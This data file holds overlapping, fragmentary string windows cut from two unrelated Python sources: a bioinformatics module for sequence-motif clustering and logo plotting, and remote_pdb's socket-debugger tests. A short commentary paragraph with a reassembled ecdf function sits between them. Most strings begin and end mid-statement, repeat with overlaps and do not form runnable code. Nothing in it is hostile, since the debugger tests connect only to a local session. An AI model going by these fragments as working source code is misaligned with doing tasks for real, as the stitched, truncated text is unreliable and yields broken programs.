"alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna",
"min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif",
"is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d)",
"= list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end",
"ids = [cluster_id for cluster_id in motives] logos = dict() for cluster_id in",
"median_len = np.median([len(s) for h, s in seqs]) sigs = None for scores",
"def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2) #",
"in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' -",
"plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname =",
"multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1",
"pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)]",
"vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time()",
"neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix",
"motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] =",
"+= l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack:",
"[list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif",
"p_value: yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration.",
"subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 <",
"[''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] =",
"sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign",
"logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids",
"for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting')",
"np.median([len(s) for h, s in seqs]) sigs = None for scores in smod.score(seqs):",
"------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png',",
"2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i,",
"% (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq)",
"[] for h, align_seq in align_seqs: str_list = [c for c in align_seq]",
"neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator",
"neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() -",
"figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname #",
"pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time =",
"for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating')",
"loc_start_time = time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() -",
"for x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append(",
"format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info =",
"hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens",
"end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]:",
"% e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' *",
"in motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image,",
"1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs,",
"_motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq =",
"logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) +",
"neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size",
"Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname)",
"%d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds))",
"subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays =",
"vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs):",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack):",
"with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'):",
"== 1: code_str = code[0] else: code_str = '(' + '|'.join(code) + ')'",
"= ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start = logo_range[0]",
"for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get()",
"enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm else: row",
"header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' %",
"): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours",
"= out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\"",
"2) # join all sequences in a cluster with enough space that #",
"xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count",
"= Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code",
"logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as",
"%.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None):",
"binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() -",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val",
"(i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq =",
"subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments' %",
"\"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header, score, begin,",
"compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y",
"% \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d",
"len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq,",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices)",
"from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\"",
"= diags self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet",
"fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size,",
"c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list =",
"# ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), #",
"in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq",
"fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b))",
"secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq)",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async(",
"% cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id,",
"orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster =",
"range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\"",
"if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives",
"len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return",
"if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4,",
"out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout)",
"if freq_th is None or freq >= freq_th: if std_th is None or",
"self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs)",
"start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score,",
"\"\"\" import logging import multiprocessing as mp import os from collections import defaultdict",
"\"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60,",
"self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs",
"seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time",
"trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs)",
"= ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id",
"%s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' '",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size,",
"= motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score /",
"logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids",
"from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from",
"[] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs",
"= motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex:",
"sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score",
"min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time()",
"to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f",
"centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for i in",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self,",
"algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import",
"neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for"
]
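The strings in the array above are overlapping token windows over a single motif-decomposition module (an EDeN-style Vectorizer/estimator pipeline with muscle alignment and Weblogo output). The windows are too sparse to reassemble the whole file, but the `ecdf` helper is fully covered by two adjacent windows. The sketch below restates it verbatim from those windows; the two-line demo underneath is invented for illustration (the `scores` sample is hypothetical, not from the source):

```python
# Reassembly sketch of the ecdf helper visible in the windows above.
# numpy is the only dependency; the demo data below is invented.
import numpy as np


def ecdf(x):
    """Empirical cumulative distribution function."""
    xs = np.sort(x)
    ys = np.arange(1, len(xs) + 1) / float(len(xs))
    return xs, ys


if __name__ == '__main__':
    scores = np.random.normal(loc=0.0, scale=1.0, size=50)  # hypothetical demo data
    xs, ys = ecdf(scores)
    # ys climbs from 1/n up to 1.0 across the sorted scores
    print(xs[:3], ys[:3])
```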
[
"func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.'",
"not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with",
"TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb",
"client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}')",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\")",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in",
"TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}')",
"'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at",
"test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' % test_name)",
"== 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' % test_name) logging.info('DIED.')",
"10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n')",
"?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d",
"logging import os import re import socket import sys import time from process_tests",
"client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n')",
"with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}',",
"wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read,",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring",
"%s}' % x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s",
"socket import sys import time from process_tests import TestProcess from process_tests import TestSocket",
"session open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0]",
"== 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test",
"% x) if __name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s',",
"x = block('{a3} ?') print('{=> %s}' % x) if __name__ == '__main__': logging.basicConfig(",
"print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams):",
"= re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:",
"__file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session",
"%(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif",
"__name__ == '__main__': logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name",
"import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT',",
"%(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name == 'test_simple':",
"'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec",
"import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import",
"proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams)",
"func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams'",
"logging.basicConfig( level=logging.DEBUG, format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with",
"TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams'",
"import re import socket import sys import time from process_tests import TestProcess from",
"__file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session",
"streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:",
"re import socket import sys import time from process_tests import TestProcess from process_tests",
"from process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings from",
"dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT,",
"(.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted",
"\"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def",
"sys import time from process_tests import TestProcess from process_tests import TestSocket from process_tests",
"def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT,",
"proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection",
"print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?')",
"test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True)",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__,",
"with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n')",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not",
") test_name = sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect':",
"import os import re import socket import sys import time from process_tests import",
"'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__,",
"'{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert",
"wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read, TIMEOUT,",
"connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with",
"def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=>",
"not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False):",
"__future__ import print_function import logging import os import re import socket import sys",
"sys.argv[2] if test_name == 'test_simple': func_a() elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else:",
"wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams)",
"print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x =",
"from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__,",
"process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple():",
"TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read):",
"func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"->",
"format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s', datefmt=\"%x~%X\" ) test_name = sys.argv[2] if test_name ==",
"import time from process_tests import TestProcess from process_tests import TestSocket from process_tests import",
"with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}',",
"process_tests import dump_on_error from process_tests import wait_for_strings from remote_pdb import set_trace TIMEOUT =",
"wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable,",
"open at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with",
"\"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\")",
"client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"{=>\") wait_for_strings(proc.read, TIMEOUT, 'DIED.') assert 'Restoring streams' not in proc.read()",
"at ') host, port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host,",
"test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}',",
"wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, \"-> print('{a2}')\") client.fh.write(b'continue\\r\\n') wait_for_strings(proc.read,",
"'{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open",
"import wait_for_strings from remote_pdb import set_trace TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with",
"func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}') func_b(patch_stdstreams) print('{a2}') x = block('{a3} ?') print('{=> %s}'",
"proc.read() def test_simple_break(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read,",
"elif test_name == 'test_redirect': func_a(patch_stdstreams=True) time.sleep(TIMEOUT) else: raise RuntimeError('Invalid test spec %r.' %",
"client: with dump_on_error(client.read): wait_for_strings(proc.read, TIMEOUT, 'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break",
"in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _: None, patch_stdstreams=False): print('{a1}')",
"TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10)) def test_simple(): with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:",
"TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'quit\\r\\n') wait_for_strings(proc.read, TIMEOUT, 'DIED.') def test_redirect(): with TestProcess(sys.executable, __file__, 'daemon',",
"'accepted connection from') wait_for_strings(client.read, TIMEOUT, \"-> print('{b2}')\") client.fh.write(b'break func_a\\r\\n') client.fh.write(b'continue\\r\\n') wait_for_strings(client.read, TIMEOUT, 'Breakpoint',",
"port = re.findall(\"RemotePdb session open at (.+):(.+),\", proc.read())[0] with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as",
"'daemon', 'test_simple') as proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open",
"proc: with dump_on_error(proc.read): wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host,",
"'Restoring streams' not in proc.read() def func_b(patch_stdstreams): print('{b1}') set_trace(patch_stdstreams=patch_stdstreams) print('{b2}') def func_a(block=lambda _:",
"TestProcess from process_tests import TestSocket from process_tests import dump_on_error from process_tests import wait_for_strings",
"import print_function import logging import os import re import socket import sys import",
"wait_for_strings(proc.read, TIMEOUT, '{a1}', '{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb",
"'{b1}', 'RemotePdb session open at ') host, port = re.findall(\"RemotePdb session open at",
